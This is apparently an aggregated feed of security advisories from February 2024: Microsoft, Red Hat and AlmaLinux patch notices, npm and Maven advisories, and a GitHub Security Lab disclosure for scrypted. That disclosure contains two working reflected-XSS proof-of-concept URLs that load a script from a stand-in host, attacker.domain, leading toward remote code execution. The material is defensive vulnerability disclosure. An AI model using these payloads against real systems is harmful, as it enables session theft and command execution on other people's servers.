13.02.2024 10:00:00	msrc	[MS:CVE-2024-21413] Microsoft Outlook Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21413
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21420] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21420
13.02.2024 10:00:00	msrc	[MS:CVE-2024-20673] Microsoft Office Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20673
13.02.2024 10:00:00	msrc	[MS:CVE-2024-20679] Azure Stack Hub Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20679
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21304] Trusted Compute Base Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21304
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21315] Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21315
13.02.2024 10:00:00	msrc	[MS:CVE-2024-20695] Skype for Business Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20695
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21328] Dynamics 365 Sales Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21328
13.02.2024 10:00:00	msrc	[MS:CVE-2024-20684] Windows Hyper-V Denial of Service Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20684
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21339] Windows USB Generic Parent Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21339
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21341] Windows Kernel Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21341
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21342] Windows DNS Client Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21342
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21343] Windows Network Address Translation (NAT) Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21343
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21344] Windows Network Address Translation (NAT) Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21344
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21345] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21345
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21346] Win32k Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21346
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21347] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21347
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21348] Internet Connection Sharing (ICS) Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21348
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21353] Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21353
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21355] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21355
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21356] Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21356
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21359] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21359
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21362] Windows Kernel Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21362
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21363] Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21363
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21364] Microsoft Azure Site Recovery Elevation of Privilege Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21364
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21365] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21365
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21367] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21367
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21368] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21368
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21370] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21370
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21374] Microsoft Teams for Android Information Disclosure (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21374
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21376] Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21376
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21377] Windows DNS Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21377
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21378] Microsoft Outlook Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21378
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21380] Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21380
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21384] Microsoft Office OneNote Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21384
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21391] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21391
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21395] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21395
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21397] Microsoft Azure File Sync Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21397
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21403] Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21403
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21405] Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21405
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21406] Windows Printing Service Spoofing Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21406
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
13.02.2024 10:00:00	msrc	[MS:CVE-2024-21412] Internet Shortcut Files Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21412
13.02.2024 02:00:00	cisa	[CISA-2024:0213] CISA Adds 2 Known Exploited Vulnerabilities to Catalog	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0213
13.02.2024 02:00:00	redhat	[RHSA-2024:0806] dotnet7.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.116 and .NET Runtime 7.0.16.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0806
13.02.2024 02:00:00	redhat	[RHSA-2024:0808] dotnet6.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0808
13.02.2024 02:00:00	redhat	[RHSA-2024:0805] dotnet7.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.116 and .NET Runtime 7.0.16.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0805
13.02.2024 02:00:00	redhat	[RHSA-2024:0807] dotnet6.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.127 and .NET Runtime 6.0.27.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0807
13.02.2024 17:08:22	npm	[NPM:GHSA-4W4V-5HC9-XRR2] angular vulnerable to super-linear runtime due to backtracking (high)	This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With a large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. Note:This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4W4V-5HC9-XRR2
14.02.2024 19:15:15	nginx	[NGINX:CVE-2024-24989] NULL pointer dereference in HTTP/3 (major)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate.Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html .NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-24989
14.02.2024 19:15:15	nginx	[NGINX:CVE-2024-24990] Use-after-free in HTTP/3 (major)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate.Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-24990
14.02.2024 18:15:45	alpinelinux	[ALPINE:CVE-2023-50387] pdns-recursor, unbound, dnsmasq, knot-resolver, bind vulnerability	[From CVE-2023-50387] Certain DNSSEC aspects of the DNS protocol (in RFC 4035 and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses when there is a zone with many DNSKEY and RRSIG records, aka the "KeyTrap" issue. The protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-50387
14.02.2024 18:15:45	alpinelinux	[ALPINE:CVE-2023-50868] pdns-recursor, unbound, dnsmasq, knot-resolver, bind vulnerability	[From CVE-2023-50868] The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-50868
14.02.2024 17:08:24	maven	[MAVEN:GHSA-5MP4-32RR-V3X5] Absolute path traversal vulnerability in digdag server (moderate)	### SummaryTreasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally.### ImpactThis issue may lead to Information Disclosure.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5MP4-32RR-V3X5
14.02.2024 12:26:35	almalinux	[ALSA-2024:0811] sudo security update (moderate)	sudo security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0811
14.02.2024 10:00:00	msrc	[MS:CVE-2024-21357] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21357
14.02.2024 10:00:00	msrc	[MS:CVE-2024-21413] Microsoft Outlook Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21413
14.02.2024 10:00:00	msrc	[MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
15.02.2024 00:53:16	rubysec	[RUBYSEC:SIDEKIQ-UNIQUE-JOBS-2024-25122] sidekiq-unique-jobs UI server vulnerable to XSS & RCE in Redis (high)	Cross site scripting (XSS) potentially exposing cookies / sessions / localStorage, fixed by sidekiq-unique-jobs v8.0.7.### DetailsSpecially crafted URL query parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI,allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link,to successfully execute malicious code, which could potentially steal cookies, session data,or local storage data from the app the sidekiq-unique-jobs web UI is mounted in.If your sidekiq-unique-jobs web UI is mounted at `/sidekiq`, the vulnerable paths and query parameters are:* `/sidekiq/changelogs` * `filter` * `count`* `/sidekiq/locks` * `filter` * `count`* `/sidekiq/expiring_locks` * `filter`### ImpactThis is a vulnerability of critical severity, which impacts many thousands of sites, since sidekiq-unique-jobs is widely deployed across the industry, with multiple attack vectors.### PatchesThe fix for the XSS vulnerability was released in sidekiq-unique-jobs v8.0.7.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:SIDEKIQ-UNIQUE-JOBS-2024-25122
14.02.2024 12:42:15	almalinux	[ALSA-2024:0786] nss security update (moderate)	nss security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0786
14.02.2024 12:34:28	almalinux	[ALSA-2024:0790] nss security update (moderate)	nss security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0790
15.02.2024 22:18:21	go	[GO-2024-2534] Unauthenticated cross-site scripting in github.com/rancher/apiserver		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2534
15.02.2024 20:15:44	alpinelinux	[ALPINE:CVE-2023-6937] wolfssl vulnerability	[From CVE-2023-6937] wolfSSL prior to 5.6.6 did not check that messages in one (D)TLS record do not span key boundaries. As a result, it was possible to combine (D)TLS messages using different keys into one (D)TLS record. The most extreme edge case is that, in (D)TLS 1.3, it was possible that an unencrypted (D)TLS 1.3 record from the server containing first a ServerHello message and then the rest of the first server flight would be accepted by a wolfSSL client. In (D)TLS 1.3 the handshake is encrypted after the ServerHello but a wolfSSL client would accept an unencrypted flight from the server. This does not compromise key negotiation and authentication so it is assigned a low severity rating.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6937
15.02.2024 02:00:00	cisa	[CISA-2024:0215] CISA Adds 2 Known Exploited Vulnerabilities to Catalog	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0215
15.02.2024 02:00:00	oraclelinux	[ELSA-2024-0805] dotnet7.0 security update (important)	[7.0.116-1.0.1]- Update to .NET SDK 7.0.116 and Runtime 7.0.16	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0805
15.02.2024 02:00:00	oraclelinux	[ELSA-2024-0806] dotnet7.0 security update (important)	[7.0.116-1.0.1]- Update to .NET SDK 7.0.116 and Runtime 7.0.16	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0806
15.02.2024 02:00:00	oraclelinux	[ELSA-2024-0807] dotnet6.0 security update (important)	[6.0.127-1.0.1]- Update to .NET SDK 6.0.127 and Runtime 6.0.27	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0807
15.02.2024 02:00:00	oraclelinux	[ELSA-2024-0808] dotnet6.0 security update (important)	[6.0.127-1.0.1]- Update to .NET SDK 6.0.127 and Runtime 6.0.27	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0808
15.02.2024 02:00:00	redhat	[RHSA-2024:0827] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0827
15.02.2024 02:00:00	redhat	[RHSA-2024:0848] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.102 and .NET Runtime 8.0.2.Security Fix(es):* dotnet: Denial of Service in SignalR server (CVE-2024-21386)* dotnet: Denial of Service in X509Certificate2 (CVE-2024-21404)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0848
15.02.2024 02:00:00	freebsd	[FREEBSD:C97A4ECF-CC25-11EE-B0EE-0050569F0B83] nginx-devel -- Multiple Vulnerabilities in HTTP/3	The nginx development team reports: When using HTTP/3 a segmentation fault might occur in a worker process while processing a specially crafted QUIC session.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:C97A4ECF-CC25-11EE-B0EE-0050569F0B83
15.02.2024 10:00:00	msrc	[MS:CVE-2024-21329] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21329
15.02.2024 10:00:00	msrc	[MS:CVE-2024-21338] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21338
15.02.2024 10:00:00	msrc	[MS:CVE-2024-21351] Windows SmartScreen Security Feature Bypass Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21351
15.02.2024 10:00:00	msrc	[MS:CVE-2024-21410] Microsoft Exchange Server Elevation of Privilege Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21410
15.02.2024 10:00:00	msrc	[MS:CVE-2024-21412] Internet Shortcut Files Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21412
15.02.2024 11:08:20	almalinux	[ALSA-2024:0808] dotnet6.0 security update (important)	dotnet6.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0808
15.02.2024 12:05:08	almalinux	[ALSA-2024:0806] dotnet7.0 security update (important)	dotnet7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0806
15.02.2024 11:13:23	almalinux	[ALSA-2024:0807] dotnet6.0 security update (important)	dotnet6.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0807
15.02.2024 11:17:54	almalinux	[ALSA-2024:0805] dotnet7.0 security update (important)	dotnet7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0805
17.02.2024 01:14:46	maven	[MAVEN:GHSA-8H4X-XVJP-VF99] Hazelcast Platform permission checking in CSV File Source connector (moderate)	### ImpactIn Hazelcast Platform through 5.3.4, a security issue exists within the SQL mapping for the CSV File Source connector. This issue arises from inadequate permission checking, which could enable unauthorized clients to access data from files stored on a member's filesystem.### PatchesFix versions: 5.3.5, 5.4.0-BETA-1### WorkaroundDisabling Hazelcast Jet processing engine in Hazelcast member configuration workarounds the issue. As a result SQL and Jet jobs won't work.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8H4X-XVJP-VF99
16.02.2024 21:29:34	npm	[NPM:GHSA-W4HV-VMV9-HGCR] GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219` (high)	# GitHub Security Lab (GHSL) Vulnerability Report, scrypted: `GHSL-2023-218`, `GHSL-2023-219`The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [scrypted](https://github.com/koush/scrypted).We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-218` or `GHSL-2023-219` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.If you are _NOT_ the correct point of contact for this report, please let us know!## SummaryTwo refelcted Cross-Site Scripting (XSS) vulnerabilities exist in scrypted that may allow an attacker to impersonate any user who clicks on specially crafted links. In the worst case, an attacker may be able to impersonate an administrator and run arbitrary commands.## Projectscrypted## Tested Version[v55.0](https://github.com/koush/scrypted/releases/tag/v0.55.0)## Details### Issue 1: reflected XSS in [`plugin-http.ts`](https://github.com/koush/scrypted/blob/71cbe83a2a20f743342df695ca7b98482b73e60f/server/src/plugin/plugin-http.ts#L45) (`GHSL-2023-218`)The `owner` and `pkg` parameters are reflected back in the response when the endpoint is not found, allowing for a reflected XSS vulnerability.```javascriptconst { owner, pkg } = req.params; let endpoint = pkg; if (owner) endpoint = `@${owner}/${endpoint}`; const pluginData = await this.getEndpointPluginData(req, endpoint, isUpgrade, isEngineIOEndpoint); if (!pluginData) { end(404, `Not Found (plugin or device "${endpoint}" not found)`); return; }```#### ImpactThis issue may lead to `Remote Code Execution`.#### RemediationIn order to remediate, ensure that parameters are not reflected back in the response. In addition, on error responses where html is unnecessary, set the `text/plain` Content-Type to prevent XSS (express defaults to text/html).#### ResourcesProof of Concept:The following url will create a script tag in the current document which will load `attacker.domain/rce.js`. This JavaScript file can then be used to communicate with the server over HTTP via RPC, and send some requests to get the `nativeId` and `proxyID` for the `automation:update-plugins` and achieve the ability to run shell commands at a specified time.https://localhost:10443/endpoint/%3Cimg%20src%20onerror=a=document.createElement('script');a.setAttribute('src',document.location.hash.substr(1));document.head.appendChild(a)%3E/pkg#//attacker.domain/rce.jsIn the browser, you should see the script element be created with the src as `https://attacker.domain/rce.js`.### Issue 2: reflected XSS in [`plugins/core/ui/src/Login.vue`](https://github.com/koush/scrypted/blob/v0.55.0/plugins/core/ui/src/Login.vue#L79) (`GHSL-2023-219`)A reflected XSS vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login.```javascript try { const redirect_uri = new URL(window.location).searchParams.get('redirect_uri'); if (redirect_uri) { window.location = redirect_uri; return; } }```#### ImpactThis issue may lead to `Remote Code Execution`.#### RemediationIn order to remediate, ensure user-controlled data is not placed into the DOM. Additionally, this is also an open redirect vulnerability because the url is not validated and a user may be redirected to an attacker controlled website after logging in, not knowing they have left the actual real website. If this redirect_uri parameter is supposed to only redirect to the current website/domain, please incorporate a check that it is only redirecting to the current domain.#### ResourcesProof of Concept:When the user is not logged in, send a link to the server with the parameter: `redirect_uri=javascript:var script = document.createElement('script');script.src = 'https://attacker.domain'; document.head.appendChild(script);`at the end of the uri (but before the #).Example: `https://localhost:10443/endpoint/test/test?redirect_uri=javascript:var%20script%20=%20document.createElement('script');script.src%20=%20'https://attacker.domain';%20document.head.appendChild(script);#//`Similar to Proof of Concept 1 this will load a JavaScript file which can make authenticated requests to the server, possibly leading to RCE.## GitHub Security AdvisoriesWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).## CreditThese issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).This vulnerability was found with the help of [CodeQL Reflected XSS query](https://codeql.github.com/codeql-query-help/javascript/js-reflected-xss/).## ContactYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-218` or `GHSL-2023-219` in any communication regarding these issues.## Disclosure PolicyThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W4HV-VMV9-HGCR
16.02.2024 18:02:59	npm	[NPM:GHSA-3787-6PRV-H9W3] Undici proxy-authorization header not cleared on cross-origin redirect in fetch (low)	### ImpactUndici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authorization` headers. ### PatchesThis is patched in v5.28.3 and v6.6.1### WorkaroundsThere are no known workarounds.### References- https://fetch.spec.whatwg.org/#authentication-entries- https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3787-6PRV-H9W3
16.02.2024 17:59:40	npm	[NPM:GHSA-9F24-JQHM-JFCW] fetch(url) leads to a memory leak in undici (moderate)	### ImpactCalling `fetch(url)` and not consuming the incoming body ((or consuming it very slowing) will lead to a memory leak. ### PatchesPatched in v6.6.1### WorkaroundsMake sure to always consume the incoming body.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9F24-JQHM-JFCW
17.02.2024 01:37:07	npm	[NPM:GHSA-PMGM-H3CC-M4HJ] React Native Document Picker Directory Traversal vulnerability (moderate)	Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMGM-H3CC-M4HJ
16.02.2024 02:00:00	debian	[DSA-5625-1] engrampa	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5625-1
16.02.2024 02:00:00	oraclelinux	[ELSA-2024-0848] .NET 8.0 security update (important)	[8.0.102-2.0.1]- Update to .NET SDK 8.0.102 and Runtime 8.0.2- Add -dbg subpackages for symbol files- Resolves: RHEL-23070	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0848
16.02.2024 12:14:33	almalinux	[ALSA-2024:0827] .NET 8.0 security update (important)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0827
16.02.2024 13:50:40	almalinux	[ALSA-2024:0848] .NET 8.0 security update (important)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0848
